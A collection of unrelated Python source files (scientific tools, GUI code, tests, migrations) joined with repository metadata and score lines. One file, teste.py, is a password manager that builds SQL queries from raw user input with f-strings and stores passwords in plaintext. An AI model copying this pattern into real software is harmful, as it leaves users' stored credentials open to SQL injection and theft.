self.groups[parentTI] = genome
self.parentTIs[TI] = parentTI
bestTIs = []
for group in self.groups:
bestTIs.append(self.groups[group][1])
return bestTIs
def getResult(self):
EPSILON = pow(10, -8)
finished = False
log_likelihood = None
while not finished:
h, N = self.EStep()
new_pi_list, new_delta_list = self.MStep(h, N)
new_log_likelihood = self.calculateLogLikelihood()
convergency_of_log_likelihood = (log_likelihood is not None) and (abs(new_log_likelihood - log_likelihood) < EPSILON)
log_likelihood = new_log_likelihood
# check if algorithm converges
finished = False
for i in range(len(self.pi_list)):
conv_pi = abs(new_pi_list[i] - self.pi_list[i]) < EPSILON
conv_delta = abs(new_delta_list[i] - self.delta_list[i]) < EPSILON
convergency_of_parameters = conv_pi and conv_delta
if convergency_of_parameters or convergency_of_log_likelihood:
finished = True
break
if not finished:
self.pi_list, self.delta_list = new_pi_list, new_delta_list
sum_pi = sum(self.pi_list)
solution = []
for i in range(len(self.genomes)):
solution.append((self.pi_list[i] / sum_pi, self.genomes[i]))
return sorted(solution, reverse=True)
def printResult(self, result):
N = 5
NO_NAME = "(no name found)"
names = [NO_NAME for i in range(N)]
TIs = [genome[1] for genome in result[:N]]
for TI in TIs:
if names[TIs.index(TI)] == NO_NAME:
names[TIs.index(TI)] = self.taxTree.taxonomyNames.get(TI, None)
for i in range(N):
print("{}. {}".format(i + 1, names[i]))
print(" {:10} {:>.8}".format(result[i][1], result[i][0]))
return TIs
@staticmethod
def calculatePi(h_j_sum_by_R, a_j, a_sum, N):
return (h_j_sum_by_R + a_j) / (N + a_sum)
@staticmethod
def calculateDelta(h_j_with_y_sum_by_R, y_sum, b_j, b_sum):
return (h_j_with_y_sum_by_R + b_j) / (y_sum + b_sum)
| 2.453125 | 2 |
text processing in python/process_beta.py | TheBrownViking20/DSstuff | 3 | 12764976 | <reponame>TheBrownViking20/DSstuff<gh_stars>1-10
import os
import glob
from process_alpha import text_process
| 1.210938 | 1 |
teste.py | richardoliveira96/Gerenciador-de-senhas | 0 | 12764977 | import sqlite3
MASTER_PASSWORD = "<PASSWORD>"
senha = input("Insira sua senha master: ")
if senha != MASTER_PASSWORD:
print("Senha inválida! Encerrando ...")
exit()
conn = sqlite3.connect('password.db')
cursor = conn.cursor()
cursor.execute('''
CREATE TABLE IF NOT EXISTS users(
service TEXT NOT NULL,
username TEXT NOT NULL,
password TEXT NOT NULL
);
''')
def menu():
print("***************************************")
print("* i : inserir nova senha *")
print("* l : listar serviços salvos *")
print("* r : recuperar uma senha *")
print("* s : sair *")
print("***************************************")
def get_password(service):
cursor.execute(f'''
SELECT username, password FROM users
WHERE service = '{service}'
''')
if cursor.rowcount == 0:
print("Serviço não cadastrado(use 'l' para verificar os serviços).")
else:
for user in cursor.fetchall():
print(user)
def insert_password(service, username, password):
cursor.execute(f'''
insert into users (service, username, password)
values('{service}', '{username}', '{password}')
''')
conn.commit()
def show_password():
cursor.execute('''
SELECT service FROM users;
''')
for service in cursor.fetchall():
print(service)
while True:
menu()
op = input("O que deseja fazer ?")
if op not in ['l', 'i', 'r', 's']:
print("Opção inválida")
continue
if op == 's':
break
if op == 'i':
service = input('Qual o nome do serviço ? ')
username = input('Qual o nome do usuário ? ')
password = input('Qual a senha? ')
insert_password(service, username, password)
if op == 'l':
show_password()
if op == 'r':
service = input('Qual o serviço para o qual quer a senha ?')
get_password(service)
conn.close() | 3.953125 | 4 |
bench/bench_long_empty_string.py | janaknat/markupsafe | 415 | 12764978 | <filename>bench/bench_long_empty_string.py
from markupsafe import escape
def run():
string = "Hello World!" * 1000
escape(string)
| 1.554688 | 2 |
tests/integration/conftest.py | stonepreston/github-runner-operator | 2 | 12764979 | <filename>tests/integration/conftest.py
from pathlib import Path
import pytest
import yaml
@pytest.fixture
def metadata():
metadata = Path("./metadata.yaml")
data = yaml.safe_load(metadata.read_text())
return data
@pytest.fixture
def model(ops_test):
return ops_test.model
@pytest.fixture
def application(model, metadata):
charm_name = metadata["name"]
app = model.applications[charm_name]
return app
@pytest.fixture
def units(application):
units = application.units
return units
| 2 | 2 |
python/marvin/tools/spaxel.py | margudo/marvin | 49 | 12764980 | <gh_stars>10-100
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# @Author: <NAME>, <NAME>, and <NAME>
# @Date: 2017-11-03
# @Filename: spaxel.py
# @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause)
#
# @Last modified by: <NAME> (<EMAIL>)
# @Last modified time: 2018-11-08 18:00:34
from __future__ import absolute_import, division, print_function
import inspect
import itertools
import warnings
import numpy as np
import marvin
import marvin.core.exceptions
import marvin.core.marvin_pickle
import marvin.tools.cube
import marvin.tools.maps
import marvin.tools.modelcube
import marvin.utils.general.general
from marvin.core.exceptions import MarvinBreadCrumb, MarvinError, MarvinUserWarning
from marvin.utils.datamodel.dap import datamodel as dap_datamodel
from marvin.utils.datamodel.drp import datamodel as drp_datamodel
from marvin.utils.general.structs import FuzzyDict
breadcrumb = MarvinBreadCrumb()
class DataModel(object):
"""A single object that holds the DRP and DAP datamodel."""
def __init__(self, release):
self.drp = drp_datamodel[release]
self.dap = dap_datamodel[release]
class Spaxel(object):
"""A base class that contains information about a spaxel.
This class represents an spaxel with information from the reduced DRP
spectrum, the DAP maps properties, and the model spectrum from the DAP
logcube. A `.SpaxelBase` can be initialised with all or only part of that
information, and either from a file, a database, or remotely via the
Marvin API.
The `~marvin.tools.cube.Cube`, `~marvin.tools.maps.Maps` , and
`~marvin.tools.modelcube.ModelCube` quantities for the spaxel are available
in ``cube_quantities``, ``maps_quantities``, and ``modelcube_quantities``,
respectively. For convenience, the quantities can also be accessed directly
from the `.SpaxelBase` itself (e.g., ``spaxel.emline_gflux_ha_6465``).
Parameters:
x,y (int):
The `x` and `y` coordinates of the spaxel in the cube (0-indexed).
cube (`~marvin.tools.cube.Cube` object or path or bool):
If ``cube`` is a `~marvin.tools.cube.Cube` object, that
cube will be used for the `.SpaxelBase` instantiation. This mode
is mostly intended for `~marvin.utils.general.general.getSpaxel`
as it significantly improves loading time. Otherwise, ``cube`` can
be ``True`` (default), in which case a cube will be instantiated
using the input ``filename``, ``mangaid``, or ``plateifu``. If
``cube=False``, no cube will be used and the cube associated
quantities will not be available. ``cube`` can also be the
path to the DRP cube to use.
maps (`~marvin.tools.maps.Maps` object or path or bool)
As ``cube`` but for the DAP measurements corresponding to the
spaxel in the `.Maps`.
modelcube (`marvin.tools.modelcube.ModelCube` object or path or bool)
As ``maps`` but for the DAP measurements corresponding to the
spaxel in the `.ModelCube`.
lazy (bool):
If ``False``, the spaxel data is loaded on instantiation.
Otherwise, only the metadata is created. The associated quantities
can be then loaded by calling `.SpaxelBase.load()`.
kwargs (dict):
Arguments to be passed to `.Cube`, `.Maps`, and `.ModelCube`
when (and if) they are initialised.
Attributes:
cube_quantities (`~marvin.utils.general.structs.FuzzyDict`):
A querable dictionary with the `.Spectrum` quantities
derived from `.Cube` and matching ``x, y``.
datamodel (object):
An object containing the DRP and DAP datamodels.
maps_quantities (`~marvin.utils.general.structs.FuzzyDict`):
A querable dictionary with the `.AnalysisProperty` quantities
derived from `.Maps` and matching ``x, y``.
model_quantities (`~marvin.utils.general.structs.FuzzyDict`):
A querable dictionary with the `.Spectrum` quantities
derived from `.ModelCube` and matching ``x, y``.
ra,dec (float):
Right ascension and declination of the spaxel. Not available until
the spaxel has been `loaded <.SpaxelBase.load>`.
"""
def __init__(self, x, y, cube=True, maps=True, modelcube=True, lazy=False, **kwargs):
if not cube and not maps and not modelcube:
raise MarvinError('no inputs defined.')
self.cube_quantities = FuzzyDict({})
self.maps_quantities = FuzzyDict({})
self.modelcube_quantities = FuzzyDict({})
self._cube = cube
self._maps = maps
self._modelcube = modelcube
for attr in ['mangaid', 'plateifu', 'release', 'bintype', 'template']:
value = kwargs.pop(attr, None) or \
getattr(cube, attr, None) or \
getattr(maps, attr, None) or \
getattr(modelcube, attr, None)
setattr(self, attr, value)
self._kwargs = kwargs
self._parent_shape = None
# drop breadcrumb
breadcrumb.drop(message='Initializing MarvinSpaxel {0}'.format(self.__class__),
category=self.__class__)
self.x = int(x)
self.y = int(y)
self.loaded = False
self.datamodel = None
if lazy is False:
self.load()
# Load VACs
from marvin.contrib.vacs.base import VACMixIn
self.vacs = VACMixIn.get_vacs(self)
def __dir__(self):
class_members = list(list(zip(*inspect.getmembers(self.__class__)))[0])
instance_attr = list(self.__dict__.keys())
items = self.cube_quantities.__dir__()
items += self.maps_quantities.__dir__()
items += self.modelcube_quantities.__dir__()
items += class_members + instance_attr
return sorted(items)
def __getattr__(self, value):
_getattr = super(Spaxel, self).__getattribute__
for tool_quantity_dict in ['cube_quantities', 'maps_quantities', 'modelcube_quantities']:
if value in _getattr(tool_quantity_dict):
return _getattr(tool_quantity_dict)[value]
return super(Spaxel, self).__getattribute__(value)
def __repr__(self):
"""Spaxel representation."""
if not self.loaded:
return '<Marvin Spaxel (x={0.x:d}, y={0.y:d}, loaded=False)'.format(self)
# Gets the coordinates relative to the centre of the cube/maps.
y_mid, x_mid = np.array(self._parent_shape) / 2.
x_centre = int(self.x - x_mid)
y_centre = int(self.y - y_mid)
# Determine what tools are loaded.
tools = np.array(['cube', 'maps', 'modelcube'])
load_idx = np.where([self._cube, self._maps, self._modelcube])[0]
flags = '/'.join(tools[load_idx])
return ('<Marvin Spaxel (plateifu={0.plateifu}, x={0.x:d}, y={0.y:d}; '
'x_cen={1:d}, y_cen={2:d}, loaded={3})>'.format(self, x_centre, y_centre, flags))
def _check_versions(self, attr):
"""Checks that all input object have the same versions.
Runs sanity checks to make sure that ``attr`` has the same value
in the input `.Cube`, `.Maps`, and `.ModelCube`. Returns the value
for the attribute or ``None`` if the attribute does not exist.
"""
out_value = None
inputs = []
for obj in [self._cube, self._maps, self._modelcube]:
if obj is not None and not isinstance(obj, bool):
inputs.append(obj)
if len(inputs) == 1:
return getattr(inputs[0], attr, None)
for obj_a, obj_b in itertools.combinations(inputs, 2):
if hasattr(obj_a, attr) and hasattr(obj_b, attr):
assert getattr(obj_a, attr) == getattr(obj_b, attr), \
'inconsistent {!r} between {!r} and {!r}'.format(attr, obj_a, obj_b)
out_value = getattr(obj_a, attr, None) or getattr(obj_b, attr, None)
return out_value
def _set_radec(self):
"""Calculates ra and dec for this spaxel."""
self.ra = None
self.dec = None
for obj in [self._cube, self._maps, self._modelcube]:
if hasattr(obj, 'wcs'):
if obj.wcs.naxis == 2:
self.ra, self.dec = obj.wcs.wcs_pix2world([[self.x, self.y]], 0)[0]
elif obj.wcs.naxis == 3:
self.ra, self.dec, __ = obj.wcs.wcs_pix2world([[self.x, self.y, 0]], 0)[0]
def save(self, path, overwrite=False):
"""Pickles the spaxel to a file.
Parameters:
path (str):
The path of the file to which the `.Spaxel` will be saved.
Unlike for other Marvin Tools that derive from
`~marvin.tools.core.MarvinToolsClass`, ``path`` is
mandatory for `.Spaxel.save` as there is no default path for a
given spaxel.
overwrite (bool):
If True, and the ``path`` already exists, overwrites it.
Otherwise it will fail.
Returns:
path (str):
The realpath to which the file has been saved.
"""
return marvin.core.marvin_pickle.save(self, path=path, overwrite=overwrite)
@classmethod
def restore(cls, path, delete=False):
"""Restores a Spaxel object from a pickled file.
If ``delete=True``, the pickled file will be removed after it has been
unplickled. Note that, for objects with ``data_origin='file'``, the
original file must exists and be in the same path as when the object
was first created.
"""
return marvin.core.marvin_pickle.restore(path, delete=delete)
def load(self, force=None):
"""Loads the spaxel data.
Loads the spaxel data for cubes/maps/modelcube. By default attempts
to load whatever is specified when spaxels are instantianted from other
Marvin Tools. Can manually force load a data type with the force
keyword.
Parameters:
-----------
force : {cube|maps|modelcube}
Datatype to force load.
"""
if self.loaded and force is None:
warnings.warn('already loaded', MarvinUserWarning)
return
assert force in [None, 'cube', 'maps', 'modelcube'], \
'force can only be cube, maps, or modelcube'
for tool in ['cube', 'maps', 'modelcube']:
self._load_tool(tool, force=(force is not None and force == tool))
self._set_radec()
self.loaded = True
for attr in ['mangaid', 'plateifu', 'release', 'bintype', 'template']:
setattr(self, attr, self._check_versions(attr))
self.datamodel = DataModel(self.release)
def _load_tool(self, tool, force=False):
"""Loads the tool and the associated quantities."""
if tool == 'cube':
class_name = marvin.tools.cube.Cube
method = self.getCube
quantities_dict = 'cube_quantities'
elif tool == 'maps':
class_name = marvin.tools.maps.Maps
method = self.getMaps
quantities_dict = 'maps_quantities'
elif tool == 'modelcube':
class_name = marvin.tools.modelcube.ModelCube
method = self.getModelCube
quantities_dict = 'modelcube_quantities'
attr_value = getattr(self, '_' + tool)
if (attr_value is False or attr_value is None) and force is False:
setattr(self, '_' + tool, None)
return
if not isinstance(attr_value, class_name):
if tool == 'modelcube' and self.release == 'MPL-4':
warnings.warn('ModelCube cannot be instantiated for MPL-4.', MarvinUserWarning)
self._modelcube = None
return
else:
setattr(self, '_' + tool, method())
else:
if force is True:
warnings.warn('{0} is already loaded'.format(tool), MarvinUserWarning)
self._parent_shape = getattr(getattr(self, '_' + tool), '_shape')
setattr(self, quantities_dict,
getattr(getattr(self, '_' + tool), '_get_spaxel_quantities')(self.x, self.y,
spaxel=self))
def getCube(self):
"""Returns the associated `~marvin.tools.cube.Cube`"""
if isinstance(self._cube, marvin.tools.cube.Cube):
return self._cube
cube_input = (self._cube if self._cube is not True else None) \
or self.plateifu or self.mangaid
return marvin.tools.cube.Cube(cube_input, release=self.release, **self._kwargs)
def getMaps(self):
"""Returns the associated `~marvin.tools.maps.Maps`"""
if isinstance(self._maps, marvin.tools.maps.Maps):
return self._maps
maps_input = (self._maps if self._maps is not True else None) \
or self.plateifu or self.mangaid
return marvin.tools.maps.Maps(maps_input, bintype=self.bintype,
template=self.template, release=self.release,
**self._kwargs)
def getModelCube(self):
"""Returns the associated `~marvin.tools.modelcube.ModelCube`"""
if isinstance(self._modelcube, marvin.tools.modelcube.ModelCube):
return self._modelcube
modelcube_input = (self._modelcube if self._modelcube is not True else None) \
or self.plateifu or self.mangaid
return marvin.tools.modelcube.ModelCube(modelcube_input, bintype=self.bintype,
template=self.template, release=self.release,
**self._kwargs)
@property
def quality_flags(self):
"""Bundle Cube DRP3QUAL and Maps DAPQUAL flags."""
drp3qual = self.datamodel.drp.bitmasks['MANGA_DRP3QUAL']
cube = self.getCube()
drp3qual.mask = int(cube.header['DRP3QUAL'])
qual_flags = [drp3qual]
if self.release != 'MPL-4':
qual_flags.append(self.datamodel.dap.bitmasks['MANGA_DAPQUAL'])
return qual_flags
| 2 | 2 |
torchcam/cams/__init__.py | alexandrosstergiou/torch-cam | 749 | 12764981 | <reponame>alexandrosstergiou/torch-cam
from .cam import *
from .gradcam import *
from .utils import *
| 0.800781 | 1 |
supasurvey/runtests.py | invisiblehands/django-supasurvey | 3 | 12764982 | <filename>supasurvey/runtests.py<gh_stars>1-10
#!/usr/bin/env python
import sys
from django.conf import settings
def runtests():
from django.test.utils import get_runner
TestRunner = get_runner(settings)
test_runner = TestRunner(verbosity=1, interactive=True)
failures = test_runner.run_tests(['supasurvey'])
sys.exit(bool(failures))
if __name__ == '__main__':
runtests()
| 1.851563 | 2 |
dfirtrack_config/migrations/0014_main_overview.py | thomas-kropeit/dfirtrack | 273 | 12764983 | <gh_stars>100-1000
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dfirtrack_config', '0013_csvimporterconfigmodel'),
]
operations = [
migrations.AddField(
model_name='mainconfigmodel',
name='main_overview',
field=models.CharField(
choices=[
('main_overview_artifact', 'Artifact'),
('main_overview_case', 'Case'),
('main_overview_system', 'System'),
('main_overview_tag', 'Tag'),
('main_overview_task', 'Task'),
],
default='main_overview_system',
max_length=50,
),
),
]
| 1.8125 | 2 |
infer.py | bennyguo/sketch2model | 21 | 12764984 | <filename>infer.py<gh_stars>10-100
import os
from options.infer_options import InferOptions
from data import create_dataset
from models import create_model
import torch
if __name__ == '__main__':
opt = InferOptions().parse()
dataset_infer = create_dataset(opt, mode='infer', shuffle=False)
model = create_model(opt)
current_epoch = model.setup(opt)
out_dir = os.path.join(opt.results_dir, opt.name, 'infer_{}'.format(current_epoch), opt.data_name)
print('creating out directory', out_dir)
os.makedirs(out_dir, exist_ok=True)
model.eval()
with torch.no_grad():
model.inference(current_epoch, dataset_infer, save_dir=out_dir)
| 2.390625 | 2 |
examples/check_model.py | Idein/onnigiri | 2 | 12764985 | <gh_stars>1-10
import sys
import numpy as np
import onnx
import onnxruntime
def make_sess(path: str) -> onnxruntime.InferenceSession:
sess_opts = onnxruntime.SessionOptions()
sess_opts.log_severity_level = 3
return onnxruntime.InferenceSession(path, sess_options=sess_opts, providers=["CPUExecutionProvider"])
if __name__ == "__main__":
assert len(sys.argv) == 5
target_dir = sys.argv[1]
origin = sys.argv[2]
pre = sys.argv[3]
post = sys.argv[4]
pre_model = onnx.load(pre)
post_model = onnx.load(post)
internal_names = [v.name for v in pre_model.graph.output]
output_names = [v.name for v in post_model.graph.output]
inputs = dict()
input_values = list()
for i in pre_model.graph.input:
shape = list()
for d in i.type.tensor_type.shape.dim:
shape.append(d.dim_value)
dtype = onnx.mapping.TENSOR_TYPE_TO_NP_TYPE[i.type.tensor_type.elem_type]
if len(shape) != 0:
v = np.random.randn(*shape).astype(dtype)
inputs[i.name] = v
input_values.append(v)
pre_sess = make_sess(pre)
internal_values = pre_sess.run(internal_names, inputs)
vs = dict()
for k, v in zip(internal_names, internal_values):
vs[k] = v
post_sess = make_sess(post)
outputs = post_sess.run(output_names, vs)
sess = make_sess(origin)
expeced = sess.run(output_names, inputs)
for a, b in zip(expeced, outputs):
print("check")
assert np.all(abs(a - b) < 1e-4)
print("pass")
| 2.015625 | 2 |
swan/widgets/plot_grid.py | INM-6/swan | 3 | 12764986 | """
Created on Nov 21, 2013
@author: <NAME>
In this module you can find the :class:`MyPlotGrid` which is just
a :class:`PyQt5.QtGui.QScrollArea` with some additions.
More important is the :class:`MyPlotContent`.
It shows an overview of many :class:`src.myplotwidget.MyPlotWidget`
and manages them.
"""
from pyqtgraph.Qt import QtCore, QtGui, QtWidgets
from swan.widgets.plot_widget import MyPlotWidget
from swan.widgets.indicator_cell import IndicatorWidget
from numpy.random import choice
class MyPlotGrid(QtWidgets.QWidget):
def __init__(self, *args, **kwargs):
QtWidgets.QWidget.__init__(self, *args, **kwargs)
self.main_grid_layout = QtWidgets.QGridLayout()
self.scroll_area = QtWidgets.QScrollArea(self)
self.scroll_area.setWidgetResizable(True)
self.scroll_area.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.scroll_area.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.child = MyPlotContent(self)
self.scroll_area.setWidget(self.child)
self.main_grid_layout.addWidget(self.scroll_area)
self.setLayout(self.main_grid_layout)
self.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.MinimumExpanding)
def minimumSizeHint(self) -> QtCore.QSize:
return QtCore.QSize(600, 400)
class MyPlotContent(QtWidgets.QWidget):
"""
A class that manages :class:`src.myplotwidget.MyPlotWidget`
objects in a grid.
The *args* and *kwargs* are passed to :class:`PyQt5.QtWidgets.QWidget`.
"""
plot_selected = QtCore.pyqtSignal(object, bool)
indicator_toggle = QtCore.pyqtSignal()
visibility_toggle = QtCore.pyqtSignal(int, int, bool)
def __init__(self, *args, **kwargs):
"""
**Properties**
*_shape* (tuple of integer):
The shape of the plot grid.
Format: (rows, cols)
*_plots* (list of :class:`src.myplotwidget.MyPlotWidget`):
The plots in a list for iterating over them.
*_selected* (list of :class:`MyPlotWidget`):
A list containing the selected plots.
*_rows* (dictionary):
A dictionary containing the row as key and a list
of plots as value for the plots in that row.
*_cols* (dictionary):
A dictionary containing the column as key and a list
of plots as value for the plots in that column.
*_yrange* (tuple of float):
The y range all plots should have.
"""
QtWidgets.QWidget.__init__(self, *args, **kwargs)
self.grid_layout = QtWidgets.QGridLayout(self)
self._shape = None
self._plots = []
self._indicators = []
self._selected = []
self._rows = {}
self._cols = {}
self._yrange = (-0.001, 0.0006)
self._xrange = (0, 0)
self._second_select = None
self._width = 60
self._height = 45
self._constant_dimension = 75
self._plot_gray = QtGui.QColor(180, 180, 180, 85)
self.sample_waveform_number = 500
self.grid_layout.setColumnStretch(1000, 1000)
self.grid_layout.setRowStretch(1000, 1000)
self.grid_layout.setHorizontalSpacing(1)
self.grid_layout.setVerticalSpacing(1)
def make_plots(self, rows, cols, dates=None):
"""
Creates a plot grid of the given shape.
**Arguments**
*rows* (integer):
The number of rows of the grid.
*cols* (integer):
The number of columns of the grid.
"""
self.delete_plots()
self._shape = (rows, cols)
self._plots = []
self._indicators = []
self._rows = {}
self._cols = {}
pivot_indicator = IndicatorWidget("Sessions (dd.mm.yy)\n\u2192\n\n\u2193 Units",
indicator_type='pivot', position=None,
width=self._width, height=self._height,
const_dim=self._constant_dimension)
pivot_indicator.responsive = False
self.grid_layout.addWidget(pivot_indicator, 0, 0, QtCore.Qt.AlignTop | QtCore.Qt.AlignLeft)
for global_unit_id in range(rows):
iw = IndicatorWidget(
str(global_unit_id + 1), indicator_type='unit', position=global_unit_id,
width=self._width, height=self._height, const_dim=self._constant_dimension
)
self._indicators.append(iw)
iw.select_indicator.connect(self.indicator_toggled)
self.grid_layout.addWidget(iw, global_unit_id + 1, 0, QtCore.Qt.AlignTop | QtCore.Qt.AlignLeft)
for session_id in range(cols):
if dates is not None:
iw = IndicatorWidget(
str(session_id + 1) + " (" + str(dates[session_id].strftime("%d.%m.%y")) + ")",
indicator_type='session', position=session_id,
width=self._width, height=self._height, const_dim=self._constant_dimension
)
else:
iw = IndicatorWidget(
str(session_id), indicator_type='session', position=session_id,
width=self._width, height=self._height, const_dim=self._constant_dimension
)
self._indicators.append(iw)
iw.select_indicator.connect(self.indicator_toggled)
self.grid_layout.addWidget(iw, 0, session_id + 1, QtCore.Qt.AlignTop | QtCore.Qt.AlignLeft)
for unit_id in range(rows):
self._rows[unit_id] = []
for session_id in range(cols):
if session_id not in self._cols:
self._cols[session_id] = []
plot_widget = MyPlotWidget(width=self._width, height=self._height)
self._plots.append(plot_widget)
plot_widget.pos = (session_id, unit_id)
self._rows[unit_id].append(plot_widget)
self._cols[session_id].append(plot_widget)
plot_widget.select_plot.connect(self.select_plot)
plot_widget.colour_strip_toggle.connect(self.toggle_indicator_colour)
plot_widget.visibility_toggle.connect(self.toggle_plot_visibility)
self.grid_layout.addWidget(plot_widget, unit_id + 1, session_id + 1,
QtCore.Qt.AlignTop | QtCore.Qt.AlignLeft)
return self._plots
@QtCore.pyqtSlot(object, int)
def toggle_indicator_colour(self, colour, i):
iw = next((x for x in self._indicators if x.row == i))
if any(plot.has_plot for plot in self._rows[i]):
iw.toggle_colour_strip(colour)
else:
iw.toggle_colour_strip(None)
@QtCore.pyqtSlot(object)
def indicator_toggled(self, indicator):
row = indicator.row
col = indicator.col
indicator_type = indicator.indicator_type
if indicator_type == 'unit':
plot_widgets = [pw for pw in self._plots if pw.pos[1] == row]
elif indicator_type == 'session':
plot_widgets = [pw for pw in self._plots if pw.pos[0] == col]
else:
plot_widgets = []
for pw in plot_widgets:
if not indicator.selected:
if indicator_type == 'session':
pw.enable("col")
elif indicator_type == 'unit':
pw.enable("row")
else:
pw.disable()
if indicator_type == 'session':
pw.inhibited_by_col = True
elif indicator_type == 'unit':
pw.inhibited_by_row = True
self.indicator_toggle.emit()
def toggle_plot_visibility(self, session_id, unit_id, visible):
self.visibility_toggle.emit(session_id, unit_id, visible)
def delete_plots(self):
"""
Deletes all plots.
"""
for p in self._plots:
p.close()
for i in self._indicators:
i.close()
def clear_plots(self):
"""
Clears all plots.
"""
for p in self._plots:
p.clear_()
p.enable("all")
for i in self._indicators:
i.colourStrip.hide()
if not i.selected:
i._bg = i.bgs["selected"]
i.set_background(i._bg)
i.selected = True
def do_plot(self, vum, data):
"""
Plots data on all plots.
**Arguments**
*vum* (:class:`src.virtualunitmap.VirtualUnitMap`):
Is needed to get the mapping.
*data* (:class:`src.neodata.NeoData`):
Is needed to get the data.
"""
active = vum.get_active()
for session in range(len(active)):
for global_unit_id in range(len(active[session])):
plot_widget = self.find_plot(global_unit_id, session)
if plot_widget.to_be_updated:
plot_widget.clear_()
pen_colour = vum.get_colour(global_unit_id)
plot_widget.default_pen_colour = pen_colour
if active[session][global_unit_id]:
unit = vum.get_realunit(session, global_unit_id, data)
mean_waveform = data.get_data("average", unit)
# all_waveforms = data.get_data("all", unit)
# try:
# plot_widget.plot_many(all_waveforms[choice(all_waveforms.shape[0],
# size=self.sample_waveform_number,
# replace=False)],
# self._plot_gray)
# except ValueError:
# plot_widget.plot_many(all_waveforms, self._plot_gray)
plot_widget.plot(mean_waveform.magnitude, pen_colour)
plot_widget.hasPlot = True
plot_widget.toggle_colour_strip(pen_colour)
plot_widget.plot_widget.setXRange(0., data.get_wave_length(), padding=None, update=True)
else:
plot_widget.toggle_colour_strip(pen_colour)
plot_widget.to_be_updated = False
def set_all_for_update(self):
for plot in self._plots:
plot.to_be_updated = True
def find_plot(self, global_unit_id, session_id):
"""
Finds a plot at a given position.
**Arguments**
*global_unit_id* (integer):
The row index.
*session_id* (integer):
The column index.
**Returns**: :class:`src.myplotwidget.MyPlotWidget`
The plot at position (global_unit_id, session_id).
"""
return self._rows[global_unit_id][session_id]
@QtCore.pyqtSlot(object)
def highlight_plot(self, item):
if item.opts['clickable']:
unit_id = item.opts['unit_id']
session = item.opts['session']
p = self.find_plot(unit_id, session)
self.select_plot(p, not p.selected)
def select_plot(self, plot, select):
"""
Selects or deselects a plot on the grid.
If nothing is selected, the plot will be selected.
Second selection is only allowed if the plot is in the same column
as the other one and if not two are already selected.
**Arguments**
*plot* (:class:`src.myplotwidget.MyPlotWidget`):
The plot to (de)select.
*select* (boolean):
Whether or not the plot should be selected.
"""
if select:
if len(self._selected) == 1 and self._selected[0].pos[0] == plot.pos[0]:
self._selected.append(plot)
plot.change_background(select)
plot.selected = select
self._second_select = plot
self.plot_selected.emit(plot, select)
elif not self._selected:
self._selected.append(plot)
plot.change_background(select)
plot.selected = select
self._second_select = None
self.plot_selected.emit(plot, select)
elif self._second_select is not None and self._selected[0].pos[0] == plot.pos[0]:
self._selected.remove(self._second_select)
self._second_select.change_background(not select)
self._second_select.selected = not select
self.plot_selected.emit(self._second_select, not select)
self._second_select = plot
self._selected.append(plot)
plot.change_background(select)
plot.selected = select
self.plot_selected.emit(plot, select)
elif plot in self._selected:
self._selected.remove(plot)
plot.change_background(select)
plot.selected = select
self.plot_selected.emit(plot, select)
def reset_selection(self):
"""
Resets the selection.
"""
for p in self._selected:
p.selected = False
p.change_background(False)
self._selected = []
def get_selection(self):
"""
**Returns**: list of :class:`src.myplotwidget.MyPlotWidget`
The selected plots.
"""
return self._selected
def zoom_in(self, step=25.0):
"""
Zooms in the plots.
**Arguments**
*step* (float):
The zoom step percentage.
Default: 25.0 percent.
"""
for plot in self._plots:
plot.change_size(width=step, height=step)
for indicator in self._indicators:
indicator.change_size(width=step, height=step)
def zoom_out(self, step=25.0):
"""
Zooms out the plots.
**Arguments**
*step* (float):
The zoom step percentage.
Default: 25.0 percent.
"""
for plot in self._plots:
plot.change_size(width=-step, height=-step)
for indicator in self._indicators:
indicator.change_size(width=-step, height=-step)
def expand(self, step=150):
"""
Increases the y range of the plots.
**Arguments**
*step* (integer):
The expand step.
Default: 150 pixels.
"""
self.set_yranges(self._yrange[0] - step, self._yrange[1] + step)
def collapse(self, step=150):
"""
Decreases the y range of the plots.
**Arguments**
*step* (integer):
The collapse step.
Default: 150 pixels.
"""
self.set_yranges(self._yrange[0] + step, self._yrange[1] - step)
def set_yranges(self, min0, max0):
"""
Sets the y ranges of all plots.
**Arguments**
*min0* (float):
The minimal y.
*max0* (float):
The maximal y.
"""
self._yrange = (min0, max0)
for plot in self._plots:
plot.plot_widget.setYRange(min0, max0, padding=None, update=True)
def set_xranges(self, min0, max0):
"""
Sets the y ranges of all plots.
**Arguments**
*min0* (float):
The minimal y.
*max0* (float):
The maximal y.
"""
self._xrange = (min0, max0)
for plot in self._plots:
plot.plot_widget.setXRange(min0, max0, padding=None, update=True)
def set_tooltips(self, tooltips):
"""
Sets tool tips for all plots.
**Arguments**
*tooltips* (dictionary):
A dictionary containing for each column of the grid
a list of string containing the tool tips for that column.
"""
for col in self._cols.keys():
tips = tooltips[col]
plots = self._cols[col]
for t, plot in zip(tips, plots):
plot.set_tooltip(t)
def swap_tooltips(self, p1, p2):
"""
Swaps the tooltips for two plots that have been swapped.
"""
tip1 = p1.toolTip()
tip2 = p2.toolTip()
p1.set_tooltip(tip2)
p2.set_tooltip(tip1)
| 2.8125 | 3 |
CommonTools/PileupAlgos/python/PUPuppi_cff.py | ckamtsikis/cmssw | 852 | 12764987 | import FWCore.ParameterSet.Config as cms
from CommonTools.PileupAlgos.Puppi_cff import *
pupuppi = puppi.clone(
invertPuppi = True
)
| 1.148438 | 1 |
criteo_marketing_transition/models/patch_ad_set.py | criteo/criteo-python-marketing-transition-sdk | 0 | 12764988 | # coding: utf-8
"""
Criteo API Transition Swagger
This is used to help Criteo clients transition from MAPI to Criteo API # noqa: E501
The version of the OpenAPI document: 1.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class PatchAdSet(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'name': 'str',
'scheduling': 'PatchAdSetScheduling',
'bidding': 'PatchAdSetBidding',
'targeting': 'AdSetTargeting',
'budget': 'PatchAdSetBudget'
}
attribute_map = {
'name': 'name',
